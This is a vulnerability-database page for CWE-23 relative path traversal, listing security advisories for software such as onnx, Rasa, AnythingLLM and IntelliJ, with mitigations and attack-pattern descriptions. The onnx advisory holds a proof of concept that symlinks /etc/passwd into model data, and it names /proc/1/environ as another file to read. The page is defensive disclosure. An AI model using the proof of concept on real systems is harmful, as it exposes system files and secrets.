Common Weakness Enumeration

CWE-23

Allowed

Relative Path Traversal

Abstraction: Base · Status: Draft

The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

778 vulnerabilities reference this CWE, most recent first.

GHSA-3MW5-7HQ7-6P5W

Vulnerability from github – Published: 2025-03-11 21:30 – Updated: 2025-03-11 21:30
VLAI
Details

NVIDIA Nemo Framework contains a vulnerability where a user could cause a relative path traversal issue by arbitrary file write. A successful exploit of this vulnerability may lead to code execution and data tampering.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-23360"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-11T20:15:16Z",
    "severity": "HIGH"
  },
  "details": "NVIDIA Nemo Framework contains a vulnerability where a user could cause a relative path traversal issue by arbitrary file write. A successful exploit of this vulnerability may lead to code execution and data tampering.",
  "id": "GHSA-3mw5-7hq7-6p5w",
  "modified": "2025-03-11T21:30:35Z",
  "published": "2025-03-11T21:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-23360"
    },
    {
      "type": "WEB",
      "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5623"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3PWM-MF62-VQ4P

Vulnerability from github – Published: 2025-01-05 18:30 – Updated: 2025-01-05 18:30
VLAI
Details

A vulnerability classified as problematic was found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). Affected by this vulnerability is an unknown functionality of the file /setting/ClassFy/exampleDownload.html. The manipulation of the argument name leads to path traversal: '/../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-0225"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-05T17:15:06Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability classified as problematic was found in Tsinghua Unigroup Electronic Archives System 3.2.210802(62532). Affected by this vulnerability is an unknown functionality of the file /setting/ClassFy/exampleDownload.html. The manipulation of the argument name leads to path traversal: \u0027/../filedir\u0027. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.",
  "id": "GHSA-3pwm-mf62-vq4p",
  "modified": "2025-01-05T18:30:35Z",
  "published": "2025-01-05T18:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-0225"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BxYQ/ld/blob/main/file_read4/poc.py"
    },
    {
      "type": "WEB",
      "url": "https://github.com/BxYQ/ld/tree/main/file_read4"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.290215"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.290215"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.474264"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-3R7Q-94C4-JM45

Vulnerability from github – Published: 2025-09-16 15:32 – Updated: 2025-09-16 15:32
VLAI
Details

A path traversal in the Control-M/Agent can lead to a local privilege escalation when an attacker has access to the system running the Agent. This vulnerability impacts the out-of-support Control-M/Agent versions 9.0.18 to 9.0.20 and potentially earlier unsupported versions. This vulnerability was fixed in 9.0.20.100 and above.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-55115"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-09-16T13:16:08Z",
    "severity": "CRITICAL"
  },
  "details": "A path traversal in the Control-M/Agent can lead to a local privilege escalation when an attacker has access to the system running the Agent. This vulnerability impacts the out-of-support Control-M/Agent versions 9.0.18 to 9.0.20 and potentially earlier unsupported versions. This vulnerability was fixed in 9.0.20.100 and above.",
  "id": "GHSA-3r7q-94c4-jm45",
  "modified": "2025-09-16T15:32:36Z",
  "published": "2025-09-16T15:32:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55115"
    },
    {
      "type": "WEB",
      "url": "https://bmcapps.my.site.com/casemgmt/sc_KnowledgeArticle?sfdcid=000441969"
    },
    {
      "type": "WEB",
      "url": "https://bmcapps.my.site.com/casemgmt/sc_KnowledgeArticle?sfdcid=000442099"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-3R9X-F23J-GC73

Vulnerability from github – Published: 2026-03-31 22:34 – Updated: 2026-04-06 16:43
VLAI
Summary
onnx Vulnerable to Path Traversal via Symlink
Details

Summary

A path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory.

Details

The following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system: https://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033

std::filesystem::is_regular_file performs a status(p) call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file.

PoC

# Create a demo model with external data
import os
import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper

def create_onnx_model(output_path="model.onnx"):
    weight_matrix = np.random.randn(1000, 1000).astype(np.float32)

    X = helper.make_tensor_value_info("X", TensorProto.FLOAT, [1, 1000])
    Y = helper.make_tensor_value_info("Y", TensorProto.FLOAT, [1, 1000])
    W = numpy_helper.from_array(weight_matrix, name="W")

    matmul_node = helper.make_node("MatMul", inputs=["X", "W"], outputs=["Y"], name="matmul")

    graph = helper.make_graph(
        nodes=[matmul_node],
        name="SimpleModel",
        inputs=[X],
        outputs=[Y],
        initializer=[W]
    )

    model = helper.make_model(graph, opset_imports=[helper.make_opsetid("", 11)])
    onnx.checker.check_model(model)

    data_file = output_path.replace('.onnx', '.data')

    if os.path.exists(output_path):
        os.remove(output_path)
    if os.path.exists(data_file):
        os.remove(data_file)

    onnx.save_model(
        model,
        output_path,
        save_as_external_data=True,
        all_tensors_to_one_file=True,
        location=os.path.basename(data_file),
        size_threshold=1024 * 1024
    )

if __name__ == "__main__":
    create_onnx_model("model.onnx")
  1. Run the above code to generate a sample model with external data.
  2. Remove model.data
  3. Run ln -s /etc/passwd model.data
  4. Load the model using the following code
  5. Observe check for symlink is bypassed and model is succesfuly loaded
import onnx
from onnx.external_data_helper import load_external_data_for_model

def load_onnx_model_basic(model_path="model.onnx"):
    model = onnx.load(model_path)
    return model

def load_onnx_model_explicit(model_path="model.onnx"):
    model = onnx.load(model_path, load_external_data=False)
    load_external_data_for_model(model, ".")
    return model

if __name__ == "__main__":
    model = load_onnx_model_basic("model.onnx")

A common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing poc.onnx and poc.data (symlink). Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.

Impact

Read sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.

NOTE: this issue is not limited to UNIX.

Sample patch

#include <fcntl.h>
#include <sys/stat.h>
#include <unistd.h>
#include <errno.h>

int open_external_file_no_symlink(const char *base_dir,
                                  const char *relative_path) {
    int dirfd = -1;
    int fd = -1;
    struct stat st;

    // Open base directory
    dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);
    if (dirfd < 0) {
        return -1;
    }

    // Open the target relative to base_dir
    // O_NOFOLLOW => fail if final path component is a symlink
    fd = openat(dirfd,
                relative_path,
                O_RDONLY | O_NOFOLLOW);
    close(dirfd);

    if (fd < 0) {
        // ELOOP is the typical error if a symlink is encountered
        return -1;
    }

    // Inspect the *opened file*
    if (fstat(fd, &st) != 0) {
        close(fd);
        return -1;
    }

    // Enforce "regular file only"
    if (!S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }

    // fd is now:
    // - not a symlink
    // - not a directory
    // - not a device / FIFO / socket
    // - race-safe
    return fd;
}

Resources

  • https://cwe.mitre.org/data/definitions/61.html
  • https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172
  • https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 1.20.0"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "onnx"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.21.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27489"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23",
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-31T22:34:25Z",
    "nvd_published_at": "2026-04-01T18:16:28Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA path traversal vulnerability via symlink allows to read arbitrary files outside model or user-provided directory. \n\n### Details\nThe following check for symlink is ineffective and it is possible to point a symlink to an arbitrary location on the file system:\nhttps://github.com/onnx/onnx/blob/336652a4b2ab1e530ae02269efa7038082cef250/onnx/checker.cc#L1024-L1033\n\n`std::filesystem::is_regular_file` performs a `status(p)` call on the provided path, which follows symbolic links to determine the file type, meaning it will return true if the target of a symlink is a regular file. \n\n\n### PoC\n\n\n\n```python\n# Create a demo model with external data\nimport os\nimport numpy as np\nimport onnx\nfrom onnx import helper, TensorProto, numpy_helper\n\ndef create_onnx_model(output_path=\"model.onnx\"):\n    weight_matrix = np.random.randn(1000, 1000).astype(np.float32)\n\n    X = helper.make_tensor_value_info(\"X\", TensorProto.FLOAT, [1, 1000])\n    Y = helper.make_tensor_value_info(\"Y\", TensorProto.FLOAT, [1, 1000])\n    W = numpy_helper.from_array(weight_matrix, name=\"W\")\n\n    matmul_node = helper.make_node(\"MatMul\", inputs=[\"X\", \"W\"], outputs=[\"Y\"], name=\"matmul\")\n\n    graph = helper.make_graph(\n        nodes=[matmul_node],\n        name=\"SimpleModel\",\n        inputs=[X],\n        outputs=[Y],\n        initializer=[W]\n    )\n\n    model = helper.make_model(graph, opset_imports=[helper.make_opsetid(\"\", 11)])\n    onnx.checker.check_model(model)\n\n    data_file = output_path.replace(\u0027.onnx\u0027, \u0027.data\u0027)\n\n    if os.path.exists(output_path):\n        os.remove(output_path)\n    if os.path.exists(data_file):\n        os.remove(data_file)\n\n    onnx.save_model(\n        model,\n        output_path,\n        save_as_external_data=True,\n        all_tensors_to_one_file=True,\n        location=os.path.basename(data_file),\n        size_threshold=1024 * 1024\n    )\n\nif __name__ == \"__main__\":\n    create_onnx_model(\"model.onnx\")\n```\n\n1. Run the above code to generate a sample model with external data.\n2. Remove `model.data`\n3. Run `ln -s /etc/passwd model.data`\n4. Load the model using the following code\n5. Observe check for symlink is bypassed and model is succesfuly loaded\n\n```python\nimport onnx\nfrom onnx.external_data_helper import load_external_data_for_model\n\ndef load_onnx_model_basic(model_path=\"model.onnx\"):\n    model = onnx.load(model_path)\n    return model\n\ndef load_onnx_model_explicit(model_path=\"model.onnx\"):\n    model = onnx.load(model_path, load_external_data=False)\n    load_external_data_for_model(model, \".\")\n    return model\n\nif __name__ == \"__main__\":\n    model = load_onnx_model_basic(\"model.onnx\")\n\n```\n\nA common misuse case for successful exploitation is that an adversary can provide victim with a compressed file, containing `poc.onnx` and `poc.data (symlink)`. Once the victim uncompress and load the model, symlink read the adversary selected arbitrary file.\n\n\n### Impact\n\nRead sensitive and arbitrary files and environment variable (e.g. /proc/1/environ) from the host that loads the model.\n\nNOTE: this issue is not limited to UNIX.\n\n### Sample patch\n\n```c\n#include \u003cfcntl.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\nint open_external_file_no_symlink(const char *base_dir,\n                                  const char *relative_path) {\n    int dirfd = -1;\n    int fd = -1;\n    struct stat st;\n\n    // Open base directory\n    dirfd = open(base_dir, O_RDONLY | O_DIRECTORY);\n    if (dirfd \u003c 0) {\n        return -1;\n    }\n\n    // Open the target relative to base_dir\n    // O_NOFOLLOW =\u003e fail if final path component is a symlink\n    fd = openat(dirfd,\n                relative_path,\n                O_RDONLY | O_NOFOLLOW);\n    close(dirfd);\n\n    if (fd \u003c 0) {\n        // ELOOP is the typical error if a symlink is encountered\n        return -1;\n    }\n\n    // Inspect the *opened file*\n    if (fstat(fd, \u0026st) != 0) {\n        close(fd);\n        return -1;\n    }\n\n    // Enforce \"regular file only\"\n    if (!S_ISREG(st.st_mode)) {\n        close(fd);\n        errno = EINVAL;\n        return -1;\n    }\n\n    // fd is now:\n    // - not a symlink\n    // - not a directory\n    // - not a device / FIFO / socket\n    // - race-safe\n    return fd;\n}\n```\n\n### Resources\n\n* https://cwe.mitre.org/data/definitions/61.html\n* https://discuss.secdim.com/t/input-validation-necessary-but-not-sufficient-it-doesnt-target-the-fundamental-issue/1172\n* https://discuss.secdim.com/t/common-pitfalls-for-patching-path-traversal/3368",
  "id": "GHSA-3r9x-f23j-gc73",
  "modified": "2026-04-06T16:43:13Z",
  "published": "2026-03-31T22:34:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/onnx/onnx/security/advisories/GHSA-3r9x-f23j-gc73"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27489"
    },
    {
      "type": "WEB",
      "url": "https://github.com/onnx/onnx/commit/4755f8053928dce18a61db8fec71b69c74f786cb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/onnx/onnx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "onnx Vulnerable to Path Traversal via Symlink"
}

GHSA-3WXQ-76W9-GHCP

Vulnerability from github – Published: 2024-02-06 12:30 – Updated: 2025-05-15 21:31
VLAI
Details

In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-24940"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-02-06T10:15:10Z",
    "severity": "LOW"
  },
  "details": "In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives",
  "id": "GHSA-3wxq-76w9-ghcp",
  "modified": "2025-05-15T21:31:19Z",
  "published": "2024-02-06T12:30:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24940"
    },
    {
      "type": "WEB",
      "url": "https://www.jetbrains.com/privacy-security/issues-fixed"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-42MW-CPGW-C7MF

Vulnerability from github – Published: 2023-02-26 15:30 – Updated: 2023-03-03 06:30
VLAI
Details

A vulnerability was found in MuYuCMS 2.2. It has been classified as problematic. Affected is an unknown function of the file /editor/index.php. The manipulation of the argument dir_path leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221802 is the identifier assigned to this vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-1043"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-02-26T13:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was found in MuYuCMS 2.2. It has been classified as problematic. Affected is an unknown function of the file /editor/index.php. The manipulation of the argument dir_path leads to relative path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-221802 is the identifier assigned to this vulnerability.",
  "id": "GHSA-42mw-cpgw-c7mf",
  "modified": "2023-03-03T06:30:17Z",
  "published": "2023-02-26T15:30:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-1043"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MuYuCMS/MuYuCMS/issues/4"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.221802"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.221802"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-4365-FHM5-QCRX

Vulnerability from github – Published: 2021-10-22 16:19 – Updated: 2024-10-16 20:45
VLAI
Summary
Maliciously Crafted Model Archive Can Lead To Arbitrary File Write
Details

Impact

An Archive Extraction (Zip Slip) vulnerability in the functionality that allows a user to load a trained model archive in Rasa 2.8.9 and older allows an attacker arbitrary write capability within specific directories using a malicious crafted archive file.

Patches

The vulnerability is fixed in Rasa 2.8.10

Workarounds

Mitigating steps for vulnerable end users are to ensure that they do not upload untrusted model files, and restrict CLI or API endpoint access where a malicious actor could target a deployed Rasa instance.

For more information

If you have any questions or comments about this advisory: * Email the Rasa Security Team

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rasa"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.8.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-41127"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-10-21T20:32:19Z",
    "nvd_published_at": "2021-10-21T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nAn Archive Extraction (Zip Slip) vulnerability in the functionality that allows a user to load a trained model archive in Rasa 2.8.9 and older allows an attacker arbitrary write capability within specific directories using a malicious crafted archive file.\n\n### Patches\nThe vulnerability is fixed in Rasa 2.8.10\n\n### Workarounds\nMitigating steps for vulnerable end users are to ensure that they do not upload untrusted model files, and restrict CLI or API endpoint access where a malicious actor could target a deployed Rasa instance.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email [the Rasa Security Team](mailto:security@rasa.com)\n",
  "id": "GHSA-4365-fhm5-qcrx",
  "modified": "2024-10-16T20:45:22Z",
  "published": "2021-10-22T16:19:13Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/RasaHQ/rasa/security/advisories/GHSA-4365-fhm5-qcrx"
    },
    {
      "type": "WEB",
      "url": "https://github.com/RasaHQ/rasa/commit/1b6b502f52d73b4f8cd1959ce724b8ad0eb33989"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/RasaHQ/rasa"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/rasa/PYSEC-2021-381.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Maliciously Crafted Model Archive Can Lead To Arbitrary File Write"
}

GHSA-4397-Q3R3-9665

Vulnerability from github – Published: 2024-10-14 03:30 – Updated: 2024-10-14 03:30
VLAI
Details

The Team+ from TEAMPLUS TECHNOLOGY does not properly validate a specific page parameter, allowing unauthenticated remote attackers to exploit this vulnerability to read arbitrary system files.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-9922"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-14T03:15:10Z",
    "severity": "HIGH"
  },
  "details": "The Team+ from TEAMPLUS TECHNOLOGY does not properly validate a specific page parameter, allowing unauthenticated remote attackers to exploit this vulnerability to read arbitrary system files.",
  "id": "GHSA-4397-q3r3-9665",
  "modified": "2024-10-14T03:30:44Z",
  "published": "2024-10-14T03:30:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-9922"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/en/cp-139-8127-41699-2.html"
    },
    {
      "type": "WEB",
      "url": "https://www.twcert.org.tw/tw/cp-132-8126-5d9d2-1.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-44G9-W23C-5RW7

Vulnerability from github – Published: 2020-08-31 22:53 – Updated: 2021-09-23 20:57
VLAI
Summary
Directory Traversal in nhouston
Details

All versions of the static file server module nhouston are vulnerable to directory traversal. An attacker can provide input such as ../ to read files outside of the served directory.

Recommendation

It is recommended that a different module be used, as we have been unable to reacher the maintainer of this module. We will continue to reach out to them, and if an update becomes available that fixes the issue, we will update this advisory accordingly.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "nhouston"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2014-8883"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-23"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2020-08-31T18:08:17Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "All versions of the static file server module nhouston are vulnerable to directory traversal. An attacker can provide input such as `../` to read files outside of the served directory.\n\n\n## Recommendation\n\nIt is recommended that a different module be used, as we have been unable to reacher the maintainer of this module. We will continue to reach out to them, and if an update becomes available that fixes the issue, we will update this advisory accordingly.",
  "id": "GHSA-44g9-w23c-5rw7",
  "modified": "2021-09-23T20:57:48Z",
  "published": "2020-08-31T22:53:54Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-8883"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/vuln/npm:nhouston:20141114"
    },
    {
      "type": "WEB",
      "url": "https://www.npmjs.com/advisories/25"
    },
    {
      "type": "WEB",
      "url": "http://en.wikipedia.org/wiki/Directory_traversal_attack"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Directory Traversal in nhouston"
}

GHSA-45P5-8Q33-98HW

Vulnerability from github – Published: 2025-03-20 12:32 – Updated: 2025-03-20 12:32
VLAI
Details

A path traversal vulnerability exists in the 'document uploads manager' feature of mintplex-labs/anything-llm, affecting the latest version prior to 1.2.2. This vulnerability allows users with the 'manager' role to access and manipulate the 'anythingllm.db' database file. By exploiting the vulnerable endpoint '/api/document/move-files', an attacker can move the database file to a publicly accessible directory, download it, and subsequently delete it. This can lead to unauthorized access to sensitive data, privilege escalation, and potential data loss.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-10513"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-23"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-20T10:15:17Z",
    "severity": "HIGH"
  },
  "details": "A path traversal vulnerability exists in the \u0027document uploads manager\u0027 feature of mintplex-labs/anything-llm, affecting the latest version prior to 1.2.2. This vulnerability allows users with the \u0027manager\u0027 role to access and manipulate the \u0027anythingllm.db\u0027 database file. By exploiting the vulnerable endpoint \u0027/api/document/move-files\u0027, an attacker can move the database file to a publicly accessible directory, download it, and subsequently delete it. This can lead to unauthorized access to sensitive data, privilege escalation, and potential data loss.",
  "id": "GHSA-45p5-8q33-98hw",
  "modified": "2025-03-20T12:32:39Z",
  "published": "2025-03-20T12:32:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-10513"
    },
    {
      "type": "WEB",
      "url": "https://github.com/mintplex-labs/anything-llm/commit/47a5c7126c20e2277ee56e2c7ee11990886a40a7"
    },
    {
      "type": "WEB",
      "url": "https://huntr.com/bounties/ad11cecf-161a-4fb1-986f-6f88272cbb9e"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation MIT-5.1
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.
  • Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
Mitigation MIT-20.1
Implementation

Strategy: Input Validation

  • Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked.
  • Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:
  • realpath() in C
  • getCanonicalPath() in Java
  • GetFullPath() in ASP.NET
  • realpath() or abs_path() in Perl
  • realpath() in PHP
Mitigation MIT-29
Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481].

CAPEC-139: Relative Path Traversal

An attacker exploits a weakness in input validation on the target by supplying a specially constructed path utilizing dot and slash characters for the purpose of obtaining access to arbitrary files or resources. An attacker modifies a known path on the target in order to reach material that is not available through intended channels. These attacks normally involve adding additional path separators (/ or \) and/or dots (.), or encodings thereof, in various combinations in order to reach parent directories or entirely separate trees of the target's directory structure.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.